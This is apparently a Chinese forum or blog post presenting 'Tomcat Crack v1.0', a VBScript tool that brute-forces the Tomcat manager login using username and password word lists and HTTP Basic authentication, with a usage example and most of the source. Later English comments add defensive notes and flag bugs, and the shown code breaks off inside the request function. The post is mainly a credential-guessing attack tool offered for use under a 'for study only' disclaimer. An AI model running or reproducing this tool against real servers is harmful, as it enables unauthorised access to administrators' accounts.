
Tomcat Crack v1.0(后台管理密码暴力破解)

发布时间:2009-10-15 09:10文章来源:未知文章作者:黑白前线 点击次数:
摘要:Tomcat后台暴力破解工具,仅供学习之用。 转载请注明出处: QQ:540410588 blog:http://hi.baidu.com/540410588 使用示例如下: cscript crack.vbs -l http://localhost:8080/manager/html/ -s 401 结果如图: 源代码如下: On Error Resume next Const sBASE_...

Tomcat后台暴力破解工具,仅供学习之用。

转载请注明出处:

QQ:540410588

blog:http://hi.baidu.com/540410588

使用示例如下:

cscript crack.vbs -l http://localhost:8080/manager/html/ -s 401

结果如图:

 

 

源代码如下:

' Script entry point: declares the shared globals, checks the script host and
' dispatches on the number of command-line arguments.
' Run-time errors at this level are suppressed rather than reported.
On Error Resume next
' Base64 alphabet; the encoder that uses it is not visible on this page.
Const sBASE_64_CHARACTERS = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
' url and search are filled in by init(); user and pass are declared here but
' are not used in the code visible on this page.
Dim url,user,pass,search
set arg=wscript.arguments
' Looks intended to exit when started under the GUI host (wscript.exe) instead of cscript.
' NOTE(review): the left side is lower-cased while the literal is mixed case, so
' this comparison appears unable to ever be true - confirm.
If (LCase(Right(Wscript.fullname,11))="Wscript.Exe") Then
Wscript.Quit
End If
' Exactly four arguments are accepted ("-l <url> -s <keyword>"); any other count
' prints the usage text and exits.
if arg.count=0 or arg.length<> 4 then
Call useage()
Wscript.Quit
Else
Call init()
End If
'-------------------------------使用说明-------------------------------------------------------
Sub useage()
' Prints the banner, the note on when the tool applies, and the command-line
' syntax with one example invocation.
    Dim rule, scriptFile
    rule = String(79, "*")
    scriptFile = wscript.scriptname

    wsh.echo rule
    wsh.echo ""
    wsh.echo "Tomcat Crack v1.0"
    wsh.echo "Made by 孤水绕城 just for test !!!"
    wsh.echo "QQ:540410588 Blog: http://hi.baidu.com/540410588"
    wsh.echo ""
    wsh.echo "注:此工具作为暴力破解用户名密码之用,条件是没有认证码做验证"
    wsh.echo "Usage:"
    wsh.echo "cscript " & scriptFile & " -l(接收用户名密码的url,需要tomcat完整路径) -s(返回错误信息关键字)"
    wsh.echo "示例如下:cscript " & scriptFile & " -l http://localhost:8080/manager/html/ -s 401"
    wsh.echo rule & vbCrLf
End Sub
'-------------------------------使用说明-------------------------------------------------------
'-------------------------------读取参数-------------------------------------------------------
Sub init()
' Copies the command-line values into the globals url (-l) and search (-s),
' then calls main() when both are non-empty; otherwise prints usage and exits.
Dim s
For s=0 To arg.length-1
' Each flag takes the argument that follows it as its value; flags are matched
' with a plain "=" comparison.
' NOTE(review): arg(s+1) is read without a bounds check when a flag is the last argument.
If(arg(s)="-l") Then :url=arg(s+1) : End If
If(arg(s)="-s") Then :search=arg(s+1) : End If
Next
' Both values are required; whitespace-only values count as missing.
If Trim(url)<>"" And Trim(search)<>"" Then
Call main()
Else
Call useage()
wscript.quit
End If

End Sub
'------------------------------该部分用于读取user和pass字典并暴力破解----------------------------------
Sub main()
' Dictionary loop against the HTTP endpoint held in the global url: every line of
' user.txt is paired with every line of pass.txt, one request per pair, with no
' delay between requests. The loop stops at the first response that does not
' contain the global search keyword.
'
' Defensive reading: on the server this appears as an uninterrupted run of failed
' authentications (401 in the page's own example) for the manager URL from one
' client. Tomcat's LockOutRealm, an address restriction such as RemoteAddrValve on
' the manager application, and the absence of default or weak manager accounts are
' the controls that blunt this pattern.
Dim base
Dim path,length,fullpath,scriptName,userStr,passStr,result,postStr
' Computes the folder that is expected to hold the two word lists from the
' script's own full path.
' NOTE(review): scriptName is declared but never assigned in this Sub, so the
' InStr/Mid arithmetic does not strip the file name as the variable names
' suggest - confirm what path actually contains.
fullpath=wscript.ScriptFullName:length=InStr(fullpath,scriptName):path=Mid(fullpath,1,length-1)
Set fso=CreateObject("Scripting.FileSystemObject")
' Both word lists must exist; otherwise a message box names the expected folder
' and the script exits.
If fso.fileExists(path&"user.txt") And fso.fileExists(path&"pass.txt") Then
Set otfuser=fso.OpenTextFile(path&"user.txt")
Do While otfuser.AtEndOfLine <> True
userStr=otfuser.readLine()
userStr=RegReplace(userStr,"[\s]+","") 'remove all whitespace from the user name
If(userStr<>"") Then
' pass.txt is reopened for every user name so that each name is paired with the
' whole password list.
Set otfpass=fso.OpenTextFile(path&"pass.txt")
Do While otfpass.AtEndOfLine <> True
' Passwords are used exactly as read; unlike user names they are not stripped.
passStr=otfpass.readLine()
wsh.echo "Checking...... "&userStr&"------"&passStr
' Base64 of "user:password" is the HTTP Basic credential format. Base64encode and
' the rest of getHTTPPage are not visible on this page, so how the value is
' attached to the request is presumed, not confirmed.
postStr=Base64encode(userStr&":"&passStr)
result=getHTTPPage(url,postStr)
' Case-insensitive search (compare mode 1). Any response that lacks the failure
' keyword is reported as a valid login, so an error page or an empty response
' would also be reported as a hit.
If(InStr(1,result,search,1)<1) Then
wsh.echo ""
wsh.echo "Good Job !!!"&vbcrlf&"You Have Found The Result"& vbcrlf&"username: "&userStr&" ------- password: "&passStr
wscript.quit
End If
loop
End If
Loop
wsh.echo "Sorry I can't Find The Result , Please Expand The Dic."
Else
MsgBox("请确定user.txt和pass.txt放在"&path&"文件夹中")
wscript.quit
End If
' Reached only when no pair matched: the success path and the missing-file path
' both leave through wscript.quit before this point.
Set otfuser=Nothing
Set otfpass=Nothing
Set fso=Nothing
End Sub
Function RegReplace(ByVal str1, ByVal patrn, ByVal replStr)
' Returns str1 with every match of the regular expression patrn replaced by
' replStr. Matching is global, case-insensitive and multi-line.
    Dim matcher
    Set matcher = New RegExp
    With matcher
        .Global = True
        .IgnoreCase = True
        .MultiLine = True
        .Pattern = patrn
        RegReplace = .Replace(str1, replStr)
    End With
    Set matcher = Nothing
End Function
'------------------------------该部分用于读取user和pass字典并暴力破解----------------------------------

'------------------------------该部分用于提交数据----------------------------------------

function getHTTPPage(url,postStr)
dim Http
'set Http=createobject("MSXML2.XMLHTTP") '用这个组件报错
set Http=createobject("MSXML2.serverXMLHTTP") '这个组件才成
Http.open "GET",url,False
Http.SetRequestHeader "Content-Type","application/x-www-form-urlencoded"
Http.setRequestHeader "Connection", "Keep-Alive"
Http.setRequestHeader "Cache-Control", "no-cache"
